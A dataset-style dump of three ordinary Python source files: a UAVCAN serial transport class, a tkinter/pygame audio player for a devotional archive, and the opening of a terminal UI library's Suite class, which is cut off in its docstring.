source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
_serial.py | #
# Copyright (c) 2019 UAVCAN Development Team
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel.kirienko@zubax.com>
#
import copy
import typing
import asyncio
import logging
import threading
import dataclasses
import concurrent.futures
import serial
import pyuavcan.transport
from ._frame import SerialFrame
from ._stream_parser import StreamParser
from ._session import SerialOutputSession, SerialInputSession
# Blocking-read timeout used by the reader thread; this also bounds how long it
# can take the reader thread to notice that the transport has been closed.
_SERIAL_PORT_READ_TIMEOUT = 1.0
_logger = logging.getLogger(__name__)
@dataclasses.dataclass
class SerialTransportStatistics(pyuavcan.transport.TransportStatistics):
    """Cumulative I/O counters sampled via :meth:`SerialTransport.sample_statistics`."""
    in_bytes: int = 0               # total bytes received from the port (frames and noise alike)
    in_frames: int = 0              # well-formed frames successfully parsed from the input stream
    in_out_of_band_bytes: int = 0   # bytes that did not belong to any recognizable frame
    out_bytes: int = 0              # bytes actually written into the port
    out_frames: int = 0             # frames fully written into the port
    out_transfers: int = 0          # transfers whose every frame was emitted successfully
    out_incomplete: int = 0         # transfers aborted mid-way (timeout or short write)
class SerialTransport(pyuavcan.transport.Transport):
    """
    The serial transport is designed for OSI L1 byte-level serial links, such as RS-485, UART, USB CDC ACM, etc.
    Please read the module documentation for details.
    """
    # Bounds for fragmentation of outgoing transfers (bytes of payload per frame).
    DEFAULT_MTU = 1024
    VALID_MTU_RANGE = (1024, 1024 * 10)
    # How many times each outgoing service transfer is repeated (deterministic data loss mitigation).
    DEFAULT_SERVICE_TRANSFER_MULTIPLIER = 2
    VALID_SERVICE_TRANSFER_MULTIPLIER_RANGE = (1, 5)
    def __init__(self,
                 serial_port: typing.Union[str, serial.SerialBase],
                 local_node_id: typing.Optional[int],
                 mtu: int = DEFAULT_MTU,
                 service_transfer_multiplier: int = DEFAULT_SERVICE_TRANSFER_MULTIPLIER,
                 baudrate: typing.Optional[int] = None,
                 loop: typing.Optional[asyncio.AbstractEventLoop] = None):
        """
        :param serial_port: The serial port instance to communicate over, or its name.
            In the latter case, the port will be constructed via :func:`serial.serial_for_url`
            (refer to the PySerial docs for the background).
            The new instance takes ownership of the port; when the instance is closed, its port will also be closed.
            Examples:
            - ``/dev/ttyACM0`` -- a regular serial port on GNU/Linux (USB CDC ACM in this example).
            - ``COM9`` -- likewise, on Windows.
            - ``/dev/serial/by-id/usb-Black_Sphere_Technologies_Black_Magic_Probe_B5DCABF5-if02`` -- a regular
              USB CDC ACM port referenced by the device name and ID (GNU/Linux).
            - ``hwgrep:///dev/serial/by-id/*Black_Magic_Probe*-if02`` -- glob instead of exact name.
            - ``socket://localhost:50905`` -- a TCP/IP tunnel instead of a physical port.
            - ``spy://COM3?file=dump.txt`` -- open a regular port and dump all data exchange into a text file.
            Read the PySerial docs for more info.
        :param local_node_id: The node-ID to use. Can't be changed after initialization.
            None means that the transport will operate in the anonymous mode.
        :param mtu: Use single-frame transfers for all outgoing transfers containing not more than than
            this many bytes of payload. Otherwise, use multi-frame transfers.
            This setting does not affect transfer reception; the RX MTU is hard-coded as ``max(VALID_MTU_RANGE)``.
        :param service_transfer_multiplier: Deterministic data loss mitigation is disabled by default.
            This parameter specifies the number of times each outgoing service transfer will be repeated.
            This setting does not affect message transfers.
        :param baudrate: If not None, the specified baud rate will be configured on the serial port.
            Otherwise, the baudrate will be left unchanged.
        :param loop: The event loop to use. Defaults to :func:`asyncio.get_event_loop`.
        """
        self._service_transfer_multiplier = int(service_transfer_multiplier)
        self._mtu = int(mtu)
        self._loop = loop if loop is not None else asyncio.get_event_loop()
        low, high = self.VALID_SERVICE_TRANSFER_MULTIPLIER_RANGE
        if not (low <= self._service_transfer_multiplier <= high):
            raise ValueError(f'Invalid service transfer multiplier: {self._service_transfer_multiplier}')
        low, high = self.VALID_MTU_RANGE
        if not (low <= self._mtu <= high):
            raise ValueError(f'Invalid MTU: {self._mtu} bytes')
        self._local_node_id = int(local_node_id) if local_node_id is not None else None
        if self._local_node_id is not None and not (0 <= self._local_node_id < self.protocol_parameters.max_nodes):
            raise ValueError(f'Invalid node ID for serial: {self._local_node_id}')
        # At first I tried using serial.is_open, but unfortunately that doesn't work reliably because the close()
        # method on most serial port classes is non-atomic, which causes all sorts of weird race conditions
        # and spurious errors in the reader thread (at least). A simple explicit flag is reliable.
        self._closed = False
        # For serial port write serialization. Read operations are performed concurrently (no sync) in separate thread.
        self._port_lock = asyncio.Lock(loop=loop)
        # The serialization buffer is pre-allocated for performance reasons;
        # it is needed to store frame contents before they are emitted into the serial port.
        # Access must be protected with the port lock!
        self._serialization_buffer = bytearray(0 for _ in range(self._mtu * 3))
        self._input_registry: typing.Dict[pyuavcan.transport.InputSessionSpecifier, SerialInputSession] = {}
        self._output_registry: typing.Dict[pyuavcan.transport.OutputSessionSpecifier, SerialOutputSession] = {}
        self._statistics = SerialTransportStatistics()
        if not isinstance(serial_port, serial.SerialBase):
            serial_port = serial.serial_for_url(serial_port)
        assert isinstance(serial_port, serial.SerialBase)
        if not serial_port.is_open:
            raise pyuavcan.transport.InvalidMediaConfigurationError('The serial port instance is not open')
        serial_port.timeout = _SERIAL_PORT_READ_TIMEOUT
        self._serial_port = serial_port
        if baudrate is not None:
            self._serial_port.baudrate = int(baudrate)
        # Writes are offloaded here so that a blocking port write does not stall the event loop.
        self._background_executor = concurrent.futures.ThreadPoolExecutor()
        # Daemonic so that a forgotten (unclosed) instance cannot prevent interpreter shutdown.
        self._reader_thread = threading.Thread(target=self._reader_thread_func, daemon=True)
        self._reader_thread.start()
    @property
    def loop(self) -> asyncio.AbstractEventLoop:
        """The event loop this transport was constructed with."""
        return self._loop
    @property
    def protocol_parameters(self) -> pyuavcan.transport.ProtocolParameters:
        """Static protocol capabilities derived from the frame format and the configured MTU."""
        return pyuavcan.transport.ProtocolParameters(
            transfer_id_modulo=SerialFrame.TRANSFER_ID_MASK + 1,
            max_nodes=len(SerialFrame.NODE_ID_RANGE),
            mtu=self._mtu,
        )
    @property
    def local_node_id(self) -> typing.Optional[int]:
        """The configured node-ID; None in the anonymous mode."""
        return self._local_node_id
    def close(self) -> None:
        """Close all sessions and the underlying port. Idempotent."""
        self._closed = True
        for s in (*self.input_sessions, *self.output_sessions):
            try:
                s.close()
            except Exception as ex:  # pragma: no cover
                _logger.exception('%s: Failed to close session %r: %s', self, s, ex)
        if self._serial_port.is_open:   # Double-close is not an error.
            self._serial_port.close()
    def get_input_session(self,
                          specifier: pyuavcan.transport.InputSessionSpecifier,
                          payload_metadata: pyuavcan.transport.PayloadMetadata) -> SerialInputSession:
        """Return the existing input session for the specifier, or create and register a new one."""
        def finalizer() -> None:
            # Invoked by the session when it is closed; de-registers it from this transport.
            del self._input_registry[specifier]
        self._ensure_not_closed()
        try:
            out = self._input_registry[specifier]
        except LookupError:
            out = SerialInputSession(specifier=specifier,
                                     payload_metadata=payload_metadata,
                                     loop=self._loop,
                                     finalizer=finalizer)
            self._input_registry[specifier] = out
        assert isinstance(out, SerialInputSession)
        assert specifier in self._input_registry
        assert out.specifier == specifier
        return out
    def get_output_session(self,
                           specifier: pyuavcan.transport.OutputSessionSpecifier,
                           payload_metadata: pyuavcan.transport.PayloadMetadata) -> SerialOutputSession:
        """Return the existing output session for the specifier, or create and register a new one.

        For service transfers with a multiplier > 1, the send handler repeats every transfer
        the configured number of times (deterministic data loss mitigation) and reports the
        timestamp of the first successful emission.
        """
        self._ensure_not_closed()
        if specifier not in self._output_registry:
            def finalizer() -> None:
                # Invoked by the session when it is closed; de-registers it from this transport.
                del self._output_registry[specifier]
            if isinstance(specifier.data_specifier, pyuavcan.transport.ServiceDataSpecifier) \
                    and self._service_transfer_multiplier > 1:
                async def send_transfer(frames: typing.Iterable[SerialFrame],
                                        monotonic_deadline: float) -> typing.Optional[pyuavcan.transport.Timestamp]:
                    # The frames iterable is consumed more than once, so it must be materialized.
                    frames = list(frames)
                    first_tx_ts: typing.Optional[pyuavcan.transport.Timestamp] = None
                    for _ in range(self._service_transfer_multiplier):  # pragma: no branch
                        ts = await self._send_transfer(frames, monotonic_deadline)
                        first_tx_ts = first_tx_ts or ts
                    return first_tx_ts
            else:
                send_transfer = self._send_transfer
            self._output_registry[specifier] = SerialOutputSession(
                specifier=specifier,
                payload_metadata=payload_metadata,
                mtu=self._mtu,
                local_node_id=self._local_node_id,
                send_handler=send_transfer,
                finalizer=finalizer
            )
        out = self._output_registry[specifier]
        assert isinstance(out, SerialOutputSession)
        assert out.specifier == specifier
        return out
    @property
    def input_sessions(self) -> typing.Sequence[SerialInputSession]:
        """A snapshot of all currently registered input sessions."""
        return list(self._input_registry.values())
    @property
    def output_sessions(self) -> typing.Sequence[SerialOutputSession]:
        """A snapshot of all currently registered output sessions."""
        return list(self._output_registry.values())
    @property
    def descriptor(self) -> str:
        """An XML-ish one-line description of this transport's configuration."""
        return \
            f'<serial baudrate="{self._serial_port.baudrate}" srv_mult="{self._service_transfer_multiplier}">' \
            f'{self._serial_port.name}</serial>'
    @property
    def serial_port(self) -> serial.SerialBase:
        """The underlying serial port instance (owned by this transport)."""
        assert isinstance(self._serial_port, serial.SerialBase)
        return self._serial_port
    def sample_statistics(self) -> SerialTransportStatistics:
        """Return a copy of the current counters (safe for the caller to keep)."""
        return copy.copy(self._statistics)
    def _handle_received_frame(self, frame: SerialFrame) -> None:
        """Dispatch a parsed frame to the matching input session(s). Runs on the event loop."""
        self._statistics.in_frames += 1
        if frame.destination_node_id in (self._local_node_id, None):
            # Both the promiscuous (source None) and the selective session, if registered, get the frame.
            for source_node_id in {None, frame.source_node_id}:
                ss = pyuavcan.transport.InputSessionSpecifier(frame.data_specifier, source_node_id)
                try:
                    session = self._input_registry[ss]
                except LookupError:
                    pass
                else:
                    # noinspection PyProtectedMember
                    session._process_frame(frame)
    def _handle_received_out_of_band_data(self, data: memoryview) -> None:
        """Log bytes that could not be parsed as a frame, decoded as UTF-8 when possible."""
        self._statistics.in_out_of_band_bytes += len(data)
        printable: typing.Union[str, bytes] = bytes(data)
        try:
            assert isinstance(printable, bytes)
            printable = printable.decode('utf8')
        except ValueError:
            pass
        _logger.warning('%s: Out-of-band: %s', self._serial_port.name, printable)
    def _handle_received_item_and_update_stats(self,
                                               item: typing.Union[SerialFrame, memoryview],
                                               in_bytes_count: int) -> None:
        """Event-loop-side entry point for items produced by the reader thread's stream parser."""
        if isinstance(item, SerialFrame):
            self._handle_received_frame(item)
        elif isinstance(item, memoryview):
            self._handle_received_out_of_band_data(item)
        else:
            assert False
        # The counter snapshot from the reader thread is cumulative, hence monotonically non-decreasing.
        assert self._statistics.in_bytes <= in_bytes_count
        self._statistics.in_bytes = int(in_bytes_count)
    async def _send_transfer(self, frames: typing.Iterable[SerialFrame], monotonic_deadline: float) \
            -> typing.Optional[pyuavcan.transport.Timestamp]:
        """
        Emits the frames belonging to the same transfer, returns the first frame transmission timestamp.
        The returned timestamp can be used for transfer feedback implementation.
        Aborts if the frames cannot be emitted before the deadline or if a write call fails.
        :returns: The first frame transmission timestamp if all frames are sent successfully.
            None on timeout or on write failure.
        """
        tx_ts: typing.Optional[pyuavcan.transport.Timestamp] = None
        self._ensure_not_closed()
        try:    # Jeez this is getting complex
            for fr in frames:
                async with self._port_lock:     # TODO: the lock acquisition should be prioritized by frame priority!
                    compiled = fr.compile_into(self._serialization_buffer)
                    timeout = monotonic_deadline - self._loop.time()
                    if timeout > 0:
                        self._serial_port.write_timeout = timeout
                        try:
                            # The blocking write runs in the executor to keep the event loop responsive.
                            num_written = await self._loop.run_in_executor(self._background_executor,
                                                                           self._serial_port.write,
                                                                           compiled)
                            tx_ts = tx_ts or pyuavcan.transport.Timestamp.now()
                        except serial.SerialTimeoutException:
                            num_written = 0
                            _logger.info('%s: Port write timed out in %.3fs on frame %r', self, timeout, fr)
                        self._statistics.out_bytes += num_written or 0
                    else:
                        tx_ts = None    # Timed out
                        break
                # Some port implementations return None on success; treat that as a full write.
                num_written = len(compiled) if num_written is None else num_written
                if num_written < len(compiled):
                    tx_ts = None    # Write failed
                    break
                self._statistics.out_frames += 1
        except Exception as ex:
            if self._closed:
                raise pyuavcan.transport.ResourceClosedError(f'{self} is closed, transmission aborted.') from ex
            else:
                raise
        else:
            if tx_ts is not None:
                self._statistics.out_transfers += 1
            else:
                self._statistics.out_incomplete += 1
        return tx_ts
    def _reader_thread_func(self) -> None:
        """Body of the reader thread: pump bytes from the port into the stream parser until closed.

        Parsed items are handed over to the event loop via call_soon_threadsafe(); no transport
        state other than the cumulative byte counter is touched from this thread.
        """
        in_bytes_count = 0
        def callback(item: typing.Union[SerialFrame, memoryview]) -> None:
            self._loop.call_soon_threadsafe(self._handle_received_item_and_update_stats, item, in_bytes_count)
        try:
            parser = StreamParser(callback, max(self.VALID_MTU_RANGE))
            assert abs(self._serial_port.timeout - _SERIAL_PORT_READ_TIMEOUT) < 0.1
            while not self._closed and self._serial_port.is_open:
                # Read at least one byte (blocking up to the port timeout), plus whatever is already buffered.
                chunk = self._serial_port.read(max(1, self._serial_port.inWaiting()))
                timestamp = pyuavcan.transport.Timestamp.now()
                in_bytes_count += len(chunk)
                parser.process_next_chunk(chunk, timestamp)
        except Exception as ex:     # pragma: no cover
            if self._closed or not self._serial_port.is_open:
                _logger.debug('%s: The serial port is closed, exception ignored: %r', self, ex)
            else:
                _logger.exception('%s: Reader thread has failed, the instance with port %s will be terminated: %s',
                                  self, self._serial_port, ex)
                self._closed = True
                self._serial_port.close()
        finally:
            _logger.debug('%s: Reader thread is exiting. Head aega.', self)
    def _ensure_not_closed(self) -> None:
        """Raise ResourceClosedError if close() has been invoked on this instance."""
        if self._closed:
            raise pyuavcan.transport.ResourceClosedError(f'{self} is closed')
|
devoaudioplayer.py | import os
import configparser
import time
from tkinter import *
import threading
import tkinter.messagebox
from tkinter import filedialog
from tkinter import ttk
from ttkthemes import themed_tk as tk
from pygame import mixer
from pathlib import Path
from functools import partial
from mutagen.mp3 import MP3
# https://icons8.com/
# Current state, shared by all the UI callbacks below.
state = {
    'file_name' : '',       # path of the most recently selected / playing file
    'paused' : False,       # True while playback is paused
    'playing' : False,      # True while a track is loaded and playing
    'muted' : False,        # True while the output is muted
    'previous_vol' : 50,    # last unmuted volume (set_vol() stores a 0.0-1.0 fraction here)
    'play_list' : [],       # full paths of queued files, parallel to the listbox rows
    'frequency' : 44100     # current mixer sample rate in Hz
}
def pick_theme(theme):
    """Persist the chosen ttk theme name to pref.ini, notify the user, and exit."""
    prefs = configparser.ConfigParser()
    prefs.read('pref.ini')
    prefs['DEFAULT']['Theme'] = theme
    with open('pref.ini', 'w') as pref_file:
        prefs.write(pref_file)
    # The theme is only applied at startup, so the app must be restarted.
    restart_note = ('The new theme is now set. '
                    'Please close this application and reopen '
                    'it to apply the new style!')
    tkinter.messagebox.showwarning('Theme now set', restart_note)
    on_closing()
def set_frequency(rate):
    """Re-initialize the pygame mixer at the given sample rate (Hz).

    The mixer must be torn down and brought back up for a rate change to
    take effect; any loaded music is discarded, so callers reload afterwards.
    """
    state['frequency'] = rate
    # Fixed typo in the console message ("frecuency" -> "frequency").
    print('The new frequency should be : ', rate)
    mixer.quit()
    mixer.pre_init(frequency=state['frequency'])
    mixer.init()  # re-initializing the mixer at the new rate
def fileOpen():
    """Ask the user for an audio file and queue it in the playlist."""
    chosen_path = filedialog.askopenfilename()
    state['file_name'] = chosen_path
    add_to_playlist(chosen_path)
def add_to_playlist(file):
    """Show the file's basename in the listbox and record its full path in the state."""
    display_name = os.path.basename(file)
    song_list_box.insert(END, display_name)
    # Keep the very first row selected by default.
    song_list_box.selection_clear(1)
    song_list_box.selection_set(0)
    state['play_list'].append(file)
def delete_song():
    """Remove the currently selected song from both the listbox and the play list."""
    selected_song = song_list_box.curselection()
    if not selected_song:
        # Nothing selected: the original code raised IndexError here.
        return
    selected_song_index = int(selected_song[0])
    # Delete by index. The original used list.remove(list[i]), which strips the
    # first *equal* path and is therefore wrong when a file is queued twice.
    del state['play_list'][selected_song_index]
    song_list_box.delete(selected_song_index)
def about():
    """Display the About dialog."""
    about_text = ('This app was made by Drew Crawford in 2018 to provide a way to listen '
                  'to the entire devotional archive, right from your computer. You can '
                  'contact me at renewedhopeguild@gmail.com with any thoughts or '
                  'suggestions.\nVersion : 1.0')
    tkinter.messagebox.showinfo('Renewed Hope Devotional Archive Player', about_text)
def show_details():
    """Determine the current track's length, show it, and start the time counter thread."""
    current_file = state['file_name']
    if current_file.endswith('mp3'):
        # mutagen reads the MP3 header without decoding the audio.
        total_length = MP3(current_file).info.length
    else:
        total_length = mixer.Sound(current_file).get_length()
    song_length_label['text'] = 'Total length ' + change_time_format(total_length)
    counter_thread = threading.Thread(target=partial(start_count, total_length))
    counter_thread.start()
def change_time_format(time):
    '''Convert the supplied time in seconds to a zero-padded mm:ss string.

    The previous docstring claimed milliseconds, but every caller passes
    seconds (mutagen/pygame track lengths and the per-second play counter).
    The parameter name shadows the `time` module; kept for interface
    compatibility with keyword callers.
    '''
    # Round the total once, then split. Rounding minutes and seconds
    # independently (as before) could produce values such as "00:60"
    # for an input of 59.6.
    total_secs = int(round(time))
    mins, secs = divmod(total_secs, 60)
    return '{:02d}:{:02d}'.format(mins, secs)
def start_count(count):
    """Worker-thread loop that updates the elapsed-time label once per second.

    When the track is about to end it advances the listbox selection and plays
    the next song; if that fails (end of the playlist), playback is stopped.
    """
    current_time = 0
    # get_busy() returns False once the music stops playing.
    while current_time <= count and mixer.music.get_busy():
        if state['paused']:
            # Sleep briefly instead of spinning: the original bare `continue`
            # busy-waited and pinned a CPU core for the whole pause.
            time.sleep(0.2)
        else:
            if current_time >= (count - 1):
                try:
                    # Move the selection to the next song and play it.
                    current_time = 0
                    selected_song = song_list_box.curselection()
                    song_list_box.selection_clear(int(selected_song[0]))
                    song_list_box.selection_set(int(selected_song[0]) + 1)
                    play_music()
                except Exception:
                    # No selection / no next song -- end of the playlist.
                    # (Narrowed from a bare `except:`, which also swallowed
                    # KeyboardInterrupt/SystemExit.)
                    stop_music()
            else:
                time_format = change_time_format(current_time)
                song_current_time['text'] = 'Current time ' + time_format
                time.sleep(1)
                current_time += 1
def play_music():
    """Play the currently selected song, or restart playback when paused.

    NOTE(review): the paused branch calls mixer.music.play() (restart from the
    beginning) instead of the commented-out unpause() -- presumably intentional,
    but worth confirming with the author.
    """
    try:
        if state['paused']:
            # mixer.music.unpause()
            state['paused'] = False
            state['playing'] = True
            mixer.music.play()
            load_middle_buttons(state['playing'])
            statusbar['text'] = 'Playing : ' + os.path.basename(state['file_name'])
        else:
            # Stop whatever was playing, then load the selected playlist entry.
            stop_music()
            time.sleep(1)
            selected_song = song_list_box.curselection()
            selected_song_index = int(selected_song[0])  # raises IndexError when nothing is selected
            mixer.music.load(state['play_list'][selected_song_index])
            state['file_name'] = state['play_list'][selected_song_index]
            if state['file_name'].endswith('mp3'):
                # If the MP3's sample rate differs from the mixer's, re-initialize
                # the mixer and reload the track (set_frequency() resets the mixer).
                mp3_file_info = MP3(state['file_name'])
                sample_rate = mp3_file_info.info.sample_rate
                if sample_rate == state['frequency']:
                    pass
                else:
                    set_frequency(sample_rate)
                    mixer.music.load(state['play_list'][selected_song_index])
            mixer.music.play()
            statusbar['text'] = 'Playing : ' + os.path.basename(state['play_list'][selected_song_index])
            state['playing'] = True
            load_middle_buttons(state['playing'])
            show_details()
    except Exception as e:
        # Any failure is reported to the user as a file-selection problem;
        # the real exception is printed to the console for debugging.
        tkinter.messagebox.showerror(
            'Error',
            'No file has been selected to play. Click the "File" button at '
            'the top and select "Open" to select a file to play from your '
            'computer.')
        print(e)
def stop_music():
    """Halt playback and update the status bar and transport buttons."""
    mixer.music.stop()
    state['playing'] = False
    statusbar['text'] = 'Stopped'
    load_middle_buttons(state['playing'])
def pause_music():
    """Toggle pause; does nothing when no track is playing."""
    if not state['playing']:
        return
    if state['paused']:
        # Resume where we left off.
        mixer.music.unpause()
        state['paused'] = False
        statusbar['text'] = 'Playing : ' + os.path.basename(state['file_name'])
        return
    mixer.music.pause()
    statusbar['text'] = 'Paused'
    state['paused'] = True
def set_vol(vol):
    """Scale callback: apply the 0-100 slider value and pick the matching speaker icon."""
    level = float(vol) * .01
    mixer.music.set_volume(level)
    if not state['muted']:
        # Remember the last unmuted level (as a 0.0-1.0 fraction) for mute().
        state['previous_vol'] = level
    applied = mixer.music.get_volume()
    if applied == 0:
        icon = mutePhoto
    elif applied <= .33:
        icon = softPhoto
    elif applied <= .66:
        icon = mediumPhoto
    else:
        icon = loudPhoto
    vol_btn.configure(image=icon)
def mute():
    """Toggle between muted and the previously selected volume, updating the icon."""
    if state['muted']:
        # Restore the remembered level and the matching icon.
        previous = state['previous_vol']
        mixer.music.set_volume(previous)
        scale.set((previous * 100))
        state['muted'] = False
        if previous <= .33:
            vol_btn.configure(image=softPhoto)
        elif previous <= .66:
            vol_btn.configure(image=mediumPhoto)
        else:
            vol_btn.configure(image=loudPhoto)
    else:
        mixer.music.set_volume(0)
        state['muted'] = True
        scale.set(0)
        vol_btn.configure(image=mutePhoto)
def load_middle_buttons(playing):
    """Rebuild the transport buttons; the first slot shows 'back' while playing, 'play' otherwise."""
    if playing:
        first_button = ttk.Button(middle_frame, image=backPhoto, command=play_music)
    else:
        first_button = ttk.Button(middle_frame, image=playPhoto, command=play_music)
    first_button.grid(row=0, column=0, padx=18)
    stop_button = ttk.Button(middle_frame, image=stopPhoto, command=stop_music)
    stop_button.grid(row=0, column=1, padx=18)
    pause_button = ttk.Button(middle_frame, image=pausePhoto, command=pause_music)
    pause_button.grid(row=0, column=2, padx=18)
def on_closing():
    """Window-close handler: stop playback before tearing down the root window."""
    stop_music()
    root.destroy()
# Loading the user preferences
config = configparser.ConfigParser()
config.read('pref.ini')
chosen_theme = config['DEFAULT']['Theme']
chosen_frequency = state['frequency']
file_path = Path.cwd() / 'themes' / chosen_theme
# Creating the root window
root = tk.ThemedTk()
root.get_themes()
root.set_theme(chosen_theme)
root.title('Renewed Hope Devotional Archive Player')
root.iconbitmap('music.ico')
# Assign all images. They must stay bound to module-level names: Tk only keeps
# a weak reference, so a garbage-collected PhotoImage would render blank.
playPhoto = PhotoImage(file=(file_path.joinpath('play.png')))
stopPhoto = PhotoImage(file=(file_path.joinpath('stop.png')))
pausePhoto = PhotoImage(file=(file_path.joinpath('pause.png')))
backPhoto = PhotoImage(file=(file_path.joinpath('back.png')))
mutePhoto = PhotoImage(file=(file_path.joinpath('mute.png')))
softPhoto = PhotoImage(file=(file_path.joinpath('soft.png')))
mediumPhoto = PhotoImage(file=(file_path.joinpath('medium.png')))
loudPhoto = PhotoImage(file=(file_path.joinpath('loud.png')))
# Creating the menubar and adding it to the root window
menuBar = Menu(root)
root.config(menu=menuBar)
# create the first sub menu
subMenu = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label='File', menu=subMenu)
subMenu.add_command(label='Open', command=fileOpen)
subMenu.add_command(label='Exit', command=root.destroy)
# Create the second subMenu
subMenu2 = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label='Theme', menu=subMenu2)
subMenu2.add_command(label='Plastik', command=partial(pick_theme, 'plastik'))
subMenu2.add_command(label='Clear looks', command=partial(pick_theme, 'clearlooks'))
subMenu2.add_command(label='Elegance', command=partial(pick_theme, 'elegance'))
# Create the third subMenu
subMenu3 = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label='Sample Rate', menu=subMenu3)
subMenu3.add_command(label='22.05 kHz', command=partial(set_frequency, 22050))
subMenu3.add_command(label='44.1 kHz', command=partial(set_frequency, 44100))
subMenu3.add_command(label='48 kHz', command=partial(set_frequency, 48000))
subMenu3.add_command(label='96 kHz', command=partial(set_frequency, 96000))
# Create the fourth subMenu
subMenu4 = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label='Help', menu=subMenu4)
subMenu4.add_command(label='About', command=about)
# initilizing the mixer
mixer.pre_init(frequency=chosen_frequency)
mixer.init()
# ============ Creating the left frame =================
left_frame = Frame(root)
left_frame.grid(column=0, row=0)
song_list_box = Listbox(left_frame)
song_list_box.grid(columnspan=2, row=0, padx=30)
add_btn = ttk.Button(left_frame, text='Add', command=fileOpen)
add_btn.grid(column= 0, row=1)
del_btn = ttk.Button(left_frame, text='Delete', command=delete_song)
del_btn.grid(column=1, row=1)
# ============ Creating the right frame =================
right_frame = Frame(root)
right_frame.grid(column=1, row=0)
top_frame = Frame(right_frame)
top_frame.grid(row=0)
song_length_label = ttk.Label(top_frame, text='Total length --:--', font='helvetica 12')
song_length_label.grid(pady=10, row=0)
song_current_time = ttk.Label(top_frame, text='Current time --:--', font='helvetica 12')
song_current_time.grid(row=1)
middle_frame = Frame(right_frame)
middle_frame.grid(pady=15, row=1)
load_middle_buttons(state['playing'])
bottom_frame = Frame(right_frame)
bottom_frame.grid(pady=15, row=2)
vol_btn = ttk.Button(bottom_frame, image=mediumPhoto, command=mute)
vol_btn.grid(row=0, column=0, padx=30)
scale = ttk.Scale(bottom_frame, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(50)
mixer.music.set_volume(.5)
scale.grid(row=0, column=1, pady=10)
# ============ Creating the bottom status bar =================
statusbar = ttk.Label(root, text='Welcome to the Renewed Hope Devotional Archive Player', relief=SUNKEN, font='helvetica 12')
statusbar.grid(columnspan=2, sticky=EW)
# Changing the close window functionality
root.protocol('WM_DELETE_WINDOW', on_closing)
root.mainloop()
suite.py | import asyncio
import os
import re
import signal
import sys
import threading
import time
from asyncio import (
AbstractEventLoop,
CancelledError,
Future,
Task,
ensure_future,
get_event_loop,
new_event_loop,
set_event_loop,
sleep,
)
from contextlib import contextmanager
from subprocess import Popen
from traceback import format_tb
from typing import (
Any,
Awaitable,
Callable,
Dict,
FrozenSet,
Generator,
Generic,
Hashable,
Iterable,
List,
Optional,
Tuple,
Type,
TypeVar,
Union,
cast,
overload,
)
from quo.buffer import Buffer
from quo.i_o.termui import echo
from quo.cache import SimpleCache
from quo.clipboard import Clipboard, InMemoryClipboard
from quo.data_structures import Size
from quo.enums import EditingMode
from quo.eventloop import (
get_traceback_from_context,
run_in_executor_with_context,
)
from quo.eventloop.utils import call_soon_threadsafe
from quo.filters import Condition, Filter, FilterOrBool, to_filter
from quo.text import AnyFormattedText
from quo.input.core import Input
from quo.input.typeahead import get_typeahead, store_typeahead
from quo.keys.key_binding.bindings.page_navigation import (
load_page_navigation_bindings,
)
from quo.keys.key_binding.defaults import load_key_bindings
from quo.keys.key_binding.emacs_state import EmacsState
from quo.keys.key_binding.key_bindings import (
Binding,
ConditionalKeyBindings,
GlobalOnlyKeyBindings,
KeyBindingsBase,
KeysTuple,
merge_key_bindings,
)
from quo.keys.key_binding.key_processor import KeyPressEvent, KeyProcessor
from quo.keys.key_binding.vi_state import ViState
from quo.keys import Keys
from quo.layout import Container, Window
from quo.layout.controls import BufferControl, UIControl
from quo.layout.dummy import create_dummy_layout
from quo.layout.layout import Layout, walk
from quo.output import ColorDepth, Output
from quo.renderer import Renderer, print_formatted_text
from quo.search import SearchState
from quo.styles import (
BaseStyle,
DummyStyle,
DummyStyleTransformation,
DynamicStyle,
StyleTransformation,
default_pygments_style,
default_ui_style,
merge_styles,
)
from quo.utils.utils import Event, in_main_thread
from .current import get_app_session, set_app
from .run_in_terminal import in_terminal, run_in_terminal
try:
import contextvars
except ImportError:
import quo.eventloop.dummy_contextvars as contextvars # type: ignore
#__all__ = [
#    "Suite",
#]
# Short alias used throughout the key-binding handlers.
E = KeyPressEvent
# Result type produced by a Suite run.
_AppResult = TypeVar("_AppResult")
# event handler: a callback receiving the running Suite instance.
onSuite = Callable[["Suite[_AppResult]"], None]
# These signals do not exist on Windows; fall back to None there.
_SIGWINCH = getattr(signal, "SIGWINCH", None)
_SIGTSTP = getattr(signal, "SIGTSTP", None)
class Suite(Generic[_AppResult]):
"""
The main Suite class!
This glues everything together.
:param layout: A :class:`~quo.layout.Layout` instance.
:param key_bindings:
:class:`~quo.keys.key_binding.KeyBindingsBase` instance for
the key bindings.
:param clipboard: :class:`~quo.clipboard.Clipboard` to use.
:param full_screen: When True, run the application on the alternate screen buffer.
:param color_depth: Any :class:`~.ColorDepth` value, a callable that
returns a :class:`~.ColorDepth` or `None` for default.
:param erase_when_done: (bool) Clear the application output when it finishes.
:param reverse_vi_search_direction: Normally, in Vi mode, a '/' searches
forward and a '?' searches backward. In Readline mode, this is usually
reversed.
:param min_redraw_interval: Number of seconds to wait between redraws. Use
this for applications where `invalidate` is called a lot. This could cause
a lot of terminal output, which some terminals are not able to process.
`None` means that every `invalidate` will be scheduled right away
(which is usually fine).
When one `invalidate` is called, but a scheduled redraw of a previous
`invalidate` call has not been executed yet, nothing will happen in any
case.
:param max_render_postpone_time: When there is high CPU (a lot of other
scheduled calls), postpone the rendering max x seconds. '0' means:
don't postpone. '.5' means: try to draw at least twice a second.
:param refresh_interval: Automatically invalidate the UI every so many
seconds. When `None` (the default), only invalidate when `invalidate`
has been called.
:param terminal_size_polling_interval: Poll the terminal size every so many
seconds. Useful if the applications runs in a thread other then then
main thread where SIGWINCH can't be handled, or on Windows.
Filters:
:param mouse_support: (:class:`~quo.filters.Filter` or
boolean). When True, enable mouse support.
:param paste_mode: :class:`~quo.filters.Filter` or boolean.
:param editing_mode: :class:`~quo.enums.EditingMode`.
:param enable_page_navigation_bindings: When `True`, enable the page
navigation key bindings. These include both Emacs and Vi bindings like
page-up, page-down and so on to scroll through pages. Mostly useful for
creating an editor or other full screen applications. Probably, you
don't want this for the implementation of a REPL. By default, this is
enabled if `full_screen` is set.
Callbacks (all of these should accept an
:class:`~quo.application.Suite` object as input.)
:param on_reset: Called during reset.
